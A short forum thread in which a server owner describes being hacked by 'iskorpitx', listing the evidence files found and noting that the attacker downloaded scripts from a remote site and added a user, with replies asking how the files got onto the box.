Server hacked by iskorpitx

[dreaken667]

iskorpitx left a trail

For anyone else this guy may have hit:

I found the script that was used to wreak the havoc on my server. The evidence in my case was located in /.bash_history, /etc/udev/pr.txt and /etc/udev/i.txt.

The history file shows the attacker downloaded the txt files from ddmalfa.cz and ran them. He also added a user named "help" before causing the system to crash.

 

[aED]

If you are running suPhp and a hacker uploaded a perl script will the script run as the user or not?

 

[__co__]

Very interesting.

Can you also post the method of how he got the files on the box? And the question is indeed, how can you run the script as root.